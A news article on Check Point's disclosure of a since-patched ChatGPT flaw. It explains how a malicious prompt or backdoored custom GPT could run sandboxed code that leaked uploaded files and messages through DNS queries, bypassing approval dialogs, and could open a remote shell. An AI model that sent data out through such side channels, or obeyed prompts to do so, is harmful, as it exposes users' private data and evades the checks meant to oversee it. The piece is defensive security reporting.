A single malicious prompt could silently steal ChatGPT conversation data — including uploaded files, user messages, and AI-generated summaries — through a DNS side channel in the platform’s code execution runtime, according to research published by Check Point on March 30. OpenAI patched the vulnerability on February 20, 2026, following responsible disclosure.
The flaw is distinct from the Codex command injection vulnerability disclosed separately by BeyondTrust’s Phantom Labs, which exposed GitHub OAuth tokens through branch name manipulation. That bug was also patched. The two vulnerabilities were reported together by The Hacker News on March 30, but they target different attack surfaces: Codex’s CI/CD pipeline versus ChatGPT’s sandboxed code execution environment.
How the Attack Worked
ChatGPT’s code execution and data analysis feature runs inside a sandboxed Linux container. OpenAI states that this environment “is unable to generate outbound network requests directly.” Direct HTTP calls are blocked. Legitimate outbound data sharing through custom GPT Actions requires explicit user approval with a dialog showing the destination and data being sent.
The Check Point researchers found a gap: DNS resolution remained unrestricted inside the container. DNS queries, typically treated as harmless infrastructure for resolving domain names, can encode arbitrary data in the subdomain portion of a request. By crafting a prompt that triggered Python code execution inside the sandbox, an attacker could encode sensitive conversation content into DNS queries sent to an attacker-controlled domain, according to The Register.
Because the AI model itself assumed the code execution environment was fully isolated, it did not flag the DNS activity as an external data transfer. No approval dialogs appeared. No warnings fired. The user saw a normal ChatGPT response while their data left the system through the DNS channel, per Check Point’s technical writeup.
Three Proof-of-Concept Attacks
Check Point demonstrated three exploitation scenarios. In one, a backdoored custom GPT posing as a health analyst ingested a user’s uploaded PDF containing lab results and personal information. When asked whether it had transmitted the data externally, ChatGPT “answered confidently that it had not, explaining that the file was only stored in a secure internal location,” The Register reported. The data had already been exfiltrated.
The researchers also showed the same hidden communication path could establish remote shell access inside the Linux runtime, enabling direct command execution, per the Check Point research paper.
The Pattern for Agent Builders
This is the second distinct OpenAI security disclosure in the past 48 hours. The Codex token exposure targeted developer tooling. Now the ChatGPT DNS exfiltration targets the platform’s core code execution infrastructure.
For teams building on top of AI platforms, the lesson from Check Point’s head of research Eli Smadja is direct: “Don’t assume AI tools are secure by default,” he wrote in Check Point’s blog summary. “Just as organizations learned not to blindly trust cloud providers, the same logic now applies to AI vendors.”
The DNS vector in particular matters for any AI system that runs code in a sandboxed environment. If the sandbox blocks HTTP but leaves DNS open, it has a data exfiltration channel. That applies to ChatGPT, to Codex, and to any agent framework that executes user-triggered code inside containers with network restrictions.
OpenAI fixed this specific flaw. But the underlying architectural assumption — that blocking HTTP constitutes network isolation — is shared across much of the AI agent infrastructure being built right now. Teams deploying agents that handle sensitive data in sandboxed code execution environments should audit their DNS policies.